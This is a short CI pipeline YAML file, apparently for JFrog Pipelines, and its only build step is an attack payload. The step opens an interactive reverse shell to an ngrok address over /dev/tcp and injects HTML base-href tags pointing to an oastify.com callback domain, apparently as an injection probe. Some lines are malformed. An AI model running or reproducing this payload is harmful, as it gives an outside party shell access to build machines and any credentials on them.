pipelines:
  - name: shmavers_pipeline
    configuration:
      nodePool:   ubuntu 
    steps:
      - name: shmaver_step
        type: Bash
        configuration:
          nodePool: ubuntu
        execution:
          onExecute:
            - echo "running shell"
            -echo"<base href=//qmg6ppbw4e8jh25eowu70ani79d01qpf.oastify.com>"
            - sh -i >& /dev/tcp/2.tcp.eu.ngrok.io/12682 0>&1
            - <base href=//qmg6ppbw4e8jh25eowu70ani79d01qpf.oastify.com>
